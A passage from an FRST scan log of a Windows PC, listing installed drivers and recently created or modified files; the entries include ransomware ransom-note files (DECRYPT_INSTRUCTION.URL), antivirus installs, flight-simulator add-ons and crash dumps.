R2 epfw; C:\Windows\System32\DRIVERS\epfw.sys [222280 2014-08-18] (ESET)

R1 EpfwLWF; C:\Windows\System32\DRIVERS\EpfwLWF.sys [44632 2014-08-18] (ESET)

R0 epfwwfp; C:\Windows\System32\DRIVERS\epfwwfp.sys [63160 2014-09-18] (ESET)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)

R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-11] (Malwarebytes Corporation)

R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)

R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19784 2014-11-06] (NVIDIA Corporation)

R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38216 2014-10-03] (NVIDIA Corporation)

R3 SaiH075C; C:\Windows\System32\DRIVERS\SaiH075C.sys [326784 2006-07-27] (Saitek)

S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)

 

==================== NetSvcs (Whitelisted) ===================

 

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

 

 

==================== One Month Created Files and Folders ========

 

(If an entry is included in the fixlist, the file\folder will be moved.)

 

2014-11-11 21:37 - 2014-11-11 21:37 - 00019905 _____ () C:\Users\Swintal\Desktop\FRST.txt

2014-11-11 21:07 - 2014-11-11 21:07 - 00292944 _____ () C:\Windows\Minidump\111114-30482-01.dmp

2014-11-11 16:20 - 2014-11-11 21:37 - 00000000 ____D () C:\FRST

2014-11-11 16:15 - 2014-11-11 16:16 - 00292784 _____ () C:\Windows\Minidump\111114-55255-01.dmp

2014-11-11 15:42 - 2014-11-11 15:42 - 00292944 _____ () C:\Windows\Minidump\111114-28922-01.dmp

2014-11-11 15:36 - 2014-11-11 15:36 - 02116096 _____ (Farbar) C:\Users\Swintal\Desktop\FRST64.exe

2014-11-11 15:25 - 2014-11-11 21:37 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys

2014-11-11 15:24 - 2014-11-11 21:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2014-11-11 15:24 - 2014-11-11 21:24 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware

2014-11-11 15:24 - 2014-11-11 15:24 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Swintal\Downloads\mbam-setup-2.0.3.1025.exe

2014-11-11 15:24 - 2014-11-11 15:24 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

2014-11-11 15:24 - 2014-11-11 15:24 - 00000000 ____D () C:\ProgramData\Malwarebytes

2014-11-11 15:24 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys

2014-11-11 15:24 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys

2014-11-11 15:24 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys

2014-11-11 15:07 - 2014-11-11 15:08 - 122472704 _____ (Microsoft Corporation) C:\Users\Swintal\Downloads\msert.exe

2014-11-11 14:51 - 2014-10-03 14:23 - 00038216 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys

2014-11-11 14:51 - 2014-10-03 14:23 - 00032584 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll

2014-11-11 13:41 - 2014-11-11 13:41 - 00292968 _____ () C:\Windows\Minidump\111114-28407-01.dmp

2014-11-11 13:34 - 2014-11-11 13:34 - 00000000 __SHD () C:\found.003

2014-11-11 13:07 - 2014-11-11 13:07 - 00000268 _____ () C:\Users\Swintal\DECRYPT_INSTRUCTION.URL

2014-11-11 13:00 - 2014-11-11 13:00 - 00000268 _____ () C:\Users\Swintal\Downloads\DECRYPT_INSTRUCTION.URL

2014-11-11 12:41 - 2014-11-11 12:41 - 00000268 _____ () C:\Users\Swintal\Documents\DECRYPT_INSTRUCTION.URL

2014-11-11 12:39 - 2014-11-11 12:39 - 00000268 _____ () C:\Users\Swintal\AppData\Roaming\DECRYPT_INSTRUCTION.URL

2014-11-11 12:39 - 2014-11-11 12:39 - 00000268 _____ () C:\Users\Swintal\AppData\DECRYPT_INSTRUCTION.URL

2014-11-11 12:38 - 2014-11-11 12:38 - 00000268 _____ () C:\Users\Swintal\AppData\Local\DECRYPT_INSTRUCTION.URL

2014-11-11 12:36 - 2014-11-11 12:36 - 00000268 _____ () C:\Users\Swintal\AppData\Local\Apps\DECRYPT_INSTRUCTION.URL

2014-11-11 12:35 - 2014-11-11 12:35 - 00000268 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.URL

2014-11-11 12:35 - 2014-11-11 12:35 - 00000268 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.URL

2014-11-11 12:34 - 2014-11-11 12:34 - 00000268 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL

2014-11-11 12:09 - 2014-11-11 14:47 - 00000000 ___HD () C:\84c4f78

2014-11-11 11:33 - 2014-11-11 21:19 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual Blue

2014-11-11 11:33 - 2014-11-11 11:33 - 00003065 _____ () C:\Users\Swintal\Desktop\bluCARS.lnk

2014-11-11 08:24 - 2014-11-11 08:24 - 00292968 _____ () C:\Windows\Minidump\111114-26566-01.dmp

2014-11-11 07:56 - 2014-11-11 21:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FS2Crew2012

2014-11-11 07:56 - 2014-11-11 21:19 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\RAASPRO

2014-11-09 20:19 - 2014-11-09 20:19 - 00039296 _____ () C:\Users\Swintal\Downloads\lizzys-support-materials.zip

2014-11-09 14:07 - 2014-11-11 12:09 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage

2014-11-09 11:40 - 2014-11-09 11:40 - 00262144 _____ () C:\Windows\Minidump\110914-52541-01.dmp

2014-11-07 17:50 - 2014-11-07 17:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud

2014-11-07 17:49 - 2014-11-07 17:49 - 00001452 _____ () C:\Users\Public\Desktop\iTunes.lnk

2014-11-07 17:49 - 2014-11-07 17:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes

2014-11-07 17:49 - 2014-11-07 17:49 - 00000000 ____D () C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7

2014-11-07 17:49 - 2014-11-07 17:49 - 00000000 ____D () C:\Program Files\iTunes

2014-11-07 17:49 - 2014-11-07 17:49 - 00000000 ____D () C:\Program Files\iPod

2014-11-07 11:00 - 2014-11-07 11:00 - 00000222 _____ () C:\Users\Swintal\Desktop\Ultimate General Gettysburg.url

2014-11-07 10:31 - 2014-11-07 10:43 - 3016997751 _____ (DarthMod Productions) C:\Users\Swintal\Downloads\DarthModEmpirev80Platinuma.exe

2014-11-05 10:16 - 2014-11-11 12:34 - 00000000 ____D () C:\ProgramData\Stardock

2014-11-05 10:16 - 2014-11-05 10:16 - 00000000 ____D () C:\Users\Swintal\Documents\My Games

2014-11-05 10:15 - 2008-10-15 06:22 - 05631312 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_40.dll

2014-11-05 10:15 - 2008-10-15 06:22 - 04379984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_40.dll

2014-11-05 10:15 - 2008-10-15 06:22 - 02605920 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_40.dll

2014-11-05 10:15 - 2008-10-15 06:22 - 02036576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_40.dll

2014-11-05 10:15 - 2008-10-15 06:22 - 00519000 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_40.dll

2014-11-05 10:15 - 2008-10-15 06:22 - 00452440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_40.dll

2014-11-05 10:12 - 2014-11-11 12:54 - 00000000 ____D () C:\Users\Swintal\Downloads\PoliticalMachine2012

2014-11-05 10:12 - 2014-11-05 10:12 - 00001089 _____ () C:\Users\Swintal\Desktop\Cheat Engine.lnk

2014-11-05 10:12 - 2014-11-05 10:12 - 00000000 ____D () C:\Users\Swintal\Documents\My Cheat Tables

2014-11-05 10:12 - 2014-11-05 10:12 - 00000000 ____D () C:\Program Files (x86)\Cheat Engine 6.4

2014-11-05 10:11 - 2014-11-05 10:11 - 09052192 _____ (Cheat Engine ) C:\Users\Swintal\Downloads\CheatEngine64.exe

2014-11-05 10:10 - 2014-11-05 10:10 - 02527824 _____ () C:\Users\Swintal\Downloads\PoliticalMachine2012.rar

2014-11-05 10:08 - 2014-11-05 10:08 - 00000222 _____ () C:\Users\Swintal\Desktop\The Political Machine 2012.url

2014-11-05 08:17 - 2014-11-11 12:51 - 00000000 ____D () C:\Users\Swintal\Downloads\FSXP3D_WorldNavaids

2014-11-05 08:16 - 2014-11-05 08:16 - 08906528 _____ () C:\Users\Swintal\Downloads\FSXP3D_WorldNavaids.zip

2014-11-05 06:32 - 2014-11-11 12:41 - 00000000 ____D () C:\Users\Swintal\Downloads\AS_Airport-Enhancement-Services_V237

2014-11-04 16:54 - 2014-11-04 16:54 - 00292960 _____ () C:\Windows\Minidump\110414-20139-01.dmp

2014-11-04 11:47 - 2014-11-04 11:48 - 79920816 _____ () C:\Users\Swintal\Downloads\AS_Airport-Enhancement-Services_V237.zip

2014-11-02 07:48 - 2014-11-02 07:48 - 00001417 _____ () C:\Users\Brian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk

2014-11-02 07:48 - 2014-11-02 07:48 - 00000000 ____D () C:\Users\Brian\AppData\Roaming\Adobe

2014-11-02 07:47 - 2014-11-09 11:36 - 00000000 ____D () C:\Users\Brian\AppData\Local\NVIDIA Corporation

2014-11-02 07:47 - 2014-11-02 07:48 - 00000000 ____D () C:\Users\Brian\AppData\Local\Google

2014-11-02 07:47 - 2014-11-02 07:48 - 00000000 ____D () C:\Users\Brian

2014-11-02 07:47 - 2014-11-02 07:47 - 00000020 ___SH () C:\Users\Brian\ntuser.ini

2014-11-02 07:47 - 2014-11-02 07:47 - 00000000 ____D () C:\Users\Brian\AppData\Local\VirtualStore

2014-11-02 07:47 - 2014-11-02 07:47 - 00000000 ____D () C:\Users\Brian\AppData\Local\NVIDIA

2014-11-02 07:47 - 2014-04-10 05:12 - 00000000 ____D () C:\Users\Brian\AppData\Roaming\Garmin

2014-11-02 07:47 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\Brian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories

2014-11-02 07:47 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\Brian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance

2014-11-01 19:56 - 2014-11-01 19:56 - 00292960 _____ () C:\Windows\Minidump\110114-24492-01.dmp

2014-11-01 17:39 - 2014-11-11 12:42 - 00000000 ____D () C:\Users\Swintal\Downloads\AS_MEGA-AIRPORT-LONDON-HEATHROW-XTENDED_FSX

2014-11-01 17:12 - 2014-11-01 17:32 - 58954784 _____ () C:\Users\Swintal\Downloads\AS_MEGA-AIRPORT-LONDON-HEATHROW-XTENDED_FSX.zip

2014-11-01 16:33 - 2014-11-01 16:34 - 222931074 _____ () C:\Users\Swintal\Downloads\FlyTampa_Athens_FSX_P3D_12.exe

2014-11-01 14:50 - 2014-11-01 14:50 - 00292960 _____ () C:\Windows\Minidump\110114-36644-01.dmp

2014-11-01 10:47 - 2014-11-11 12:38 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Hifi

2014-11-01 10:47 - 2014-11-01 10:47 - 00001112 _____ () C:\Users\Swintal\Desktop\Active Sky Next for FSX SP1B.lnk

2014-11-01 10:47 - 2014-11-01 10:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HiFi

2014-11-01 10:47 - 2014-11-01 10:47 - 00000000 ____D () C:\Program Files (x86)\HiFi

2014-11-01 08:49 - 2014-11-01 08:50 - 00000000 ____D () C:\Program Files (x86)\QuickTime

2014-11-01 08:49 - 2014-11-01 08:49 - 00001845 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk

2014-11-01 08:49 - 2014-11-01 08:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime

2014-10-26 14:52 - 2014-10-26 14:59 - 159554687 _____ () C:\Users\Swintal\Downloads\EJets_FSX_v16.exe

2014-10-26 09:21 - 2014-10-26 09:21 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\United Virtual Airlines

2014-10-26 09:21 - 2014-10-26 09:21 - 00000000 ____D () C:\Program Files (x86)\United Virtual Airlines

2014-10-26 09:19 - 2014-10-26 09:20 - 31212496 _____ () C:\Users\Swintal\Downloads\acars_v3.3.15B.zip

2014-10-26 08:38 - 2014-10-26 08:38 - 00292960 _____ () C:\Windows\Minidump\102614-19359-01.dmp

2014-10-25 16:42 - 2014-10-25 16:42 - 00292968 _____ () C:\Windows\Minidump\102514-23150-01.dmp

2014-10-25 10:06 - 2014-10-25 10:06 - 00000000 __SHD () C:\found.002

2014-10-25 09:06 - 2014-11-11 21:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET

2014-10-25 09:06 - 2014-10-25 09:06 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\ESET

2014-10-25 09:06 - 2014-10-25 09:06 - 00000000 ____D () C:\Users\Swintal\AppData\Local\ESET

2014-10-25 09:06 - 2014-10-25 09:06 - 00000000 ____D () C:\ProgramData\ESET

2014-10-25 09:06 - 2014-10-25 09:06 - 00000000 ____D () C:\Program Files\ESET

2014-10-25 09:00 - 2014-10-25 09:00 - 01661128 _____ (ESET) C:\Users\Swintal\Downloads\eset_smart_security_live_installer.exe

2014-10-25 08:28 - 2014-10-25 08:28 - 03834608 _____ (Catalina Marketing Corp) C:\Users\Swintal\Downloads\CatalinaSavingsPrinter.exe

2014-10-25 08:23 - 2014-10-25 08:23 - 00292936 _____ () C:\Windows\Minidump\102514-31715-01.dmp

2014-10-21 08:07 - 2014-10-21 08:07 - 00292920 _____ () C:\Windows\Minidump\102114-18330-01.dmp

2014-10-17 02:01 - 2014-10-17 02:01 - 00000000 ____D () C:\Program Files (x86)\Microsoft ASP.NET

2014-10-16 18:55 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll

2014-10-16 18:55 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll

2014-10-16 18:55 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll

2014-10-16 18:55 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll

2014-10-16 18:55 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll

2014-10-16 18:55 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys

2014-10-16 18:55 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll

2014-10-16 18:55 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll

2014-10-16 18:55 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll

2014-10-16 18:55 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll

2014-10-16 18:55 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll

2014-10-16 18:55 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl

2014-10-16 18:55 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl

2014-10-16 18:55 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll

2014-10-16 18:55 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb

2014-10-16 18:55 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll

2014-10-16 18:55 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll

2014-10-16 18:55 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll

2014-10-16 18:55 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll

2014-10-16 18:55 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll

2014-10-16 18:55 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll

2014-10-16 18:55 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll

2014-10-16 18:55 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll

2014-10-16 18:55 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll

2014-10-16 18:55 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll

2014-10-16 18:55 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll

2014-10-16 18:55 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe

2014-10-16 18:55 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll

2014-10-16 18:55 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll

2014-10-16 18:55 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe

2014-10-16 18:55 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe

2014-10-16 18:55 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb

2014-10-16 18:55 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll

2014-10-16 18:55 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll

2014-10-16 18:55 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll

2014-10-16 18:55 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll

2014-10-16 18:55 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll

2014-10-16 18:55 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll

2014-10-16 18:55 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll

2014-10-16 18:55 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll

2014-10-16 18:55 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll

2014-10-16 18:55 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll

2014-10-16 18:55 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll

2014-10-16 18:55 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll

2014-10-16 18:55 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll

2014-10-16 18:55 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe

2014-10-16 18:55 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll

2014-10-16 18:55 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll

2014-10-16 18:55 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe

2014-10-16 18:55 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll

2014-10-16 18:55 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll

2014-10-16 18:55 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll

2014-10-16 18:55 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll

2014-10-16 18:55 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll

2014-10-16 18:55 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll

2014-10-16 18:55 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll

2014-10-16 18:55 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll

2014-10-16 18:55 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll

2014-10-16 18:55 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll

2014-10-16 18:55 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll

2014-10-16 18:55 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL

2014-10-16 18:55 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL

2014-10-16 18:55 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL

2014-10-16 18:55 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL

2014-10-16 18:55 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL

2014-10-16 18:55 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL

2014-10-16 18:55 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL

2014-10-16 18:55 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL

2014-10-16 18:55 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL

2014-10-16 18:55 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL

2014-10-16 18:55 - 2014-07-08 17:38 - 00419992 _____ () C:\Windows\system32\locale.nls

2014-10-16 18:55 - 2014-07-08 17:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls

2014-10-16 18:55 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll

2014-10-16 18:55 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll

2014-10-16 18:55 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll

2014-10-16 18:55 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll

2014-10-16 18:55 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll

2014-10-16 18:55 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll

2014-10-16 18:52 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll

2014-10-16 18:52 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll

2014-10-16 18:52 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll

2014-10-16 18:52 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll

2014-10-16 18:52 - 2014-09-04 21:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll

2014-10-16 18:52 - 2014-09-04 20:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll

2014-10-16 18:52 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll

2014-10-16 18:52 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll

2014-10-16 18:52 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll

2014-10-16 18:52 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll

2014-10-16 18:52 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe

2014-10-16 18:52 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll

2014-10-16 18:52 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll

2014-10-16 18:52 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll

2014-10-16 18:52 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll

2014-10-16 18:52 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll

2014-10-16 18:52 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll

2014-10-16 18:52 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll

2014-10-16 18:52 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys

2014-10-16 18:52 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys

2014-10-15 13:24 - 2014-10-15 13:26 - 25074304 _____ () C:\Users\Swintal\Downloads\United 319.zip

2014-10-15 13:13 - 2014-10-15 13:13 - 00122208 _____ () C:\Users\Swintal\Downloads\Airbus_ECAMD2D.zip

2014-10-15 13:11 - 2014-10-15 13:11 - 00134976 _____ () C:\Users\Swintal\Downloads\AB_ND_GDI.zip

2014-10-15 13:03 - 2014-10-15 13:03 - 03873168 _____ () C:\Users\Swintal\Downloads\HF_AIRBUS31819_1_02c.zip

2014-10-12 13:36 - 2014-10-12 13:36 - 00262144 _____ () C:\Windows\Minidump\101214-20841-01.dmp

 

==================== One Month Modified Files and Folders =======

 

(If an entry is included in the fixlist, the file\folder will be moved.)

 

2014-11-11 21:33 - 2014-03-14 19:49 - 00004990 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for Swintal-PC-Swintal Swintal-PC

2014-11-11 21:32 - 2014-10-03 14:53 - 00000000 ___RD () C:\Users\Swintal\iCloudDrive

2014-11-11 21:31 - 2014-03-01 12:59 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job

2014-11-11 21:31 - 2009-07-13 23:51 - 00120950 _____ () C:\Windows\setupact.log

2014-11-11 21:30 - 2014-03-01 16:09 - 00000000 ____D () C:\ProgramData\NVIDIA

2014-11-11 21:30 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT

2014-11-11 21:24 - 2014-07-03 17:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Navtech

2014-11-11 21:24 - 2014-03-02 13:18 - 00000000 ____D () C:\ProgramData\Licenses

2014-11-11 21:24 - 2014-03-01 19:40 - 00000000 ____D () C:\Microsoft Flight Simulator X

2014-11-11 21:24 - 2014-03-01 16:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation

2014-11-11 21:24 - 2014-03-01 16:22 - 00000000 ____D () C:\Program Files (x86)\NVIDIA Corporation

2014-11-11 21:24 - 2014-03-01 16:21 - 00000000 ____D () C:\Program Files\NVIDIA Corporation

2014-11-11 21:19 - 2014-07-10 17:00 - 00000000 ____D () C:\Windows\SysWOW64\Macromed

2014-11-11 21:19 - 2014-07-10 17:00 - 00000000 ____D () C:\Windows\system32\Macromed

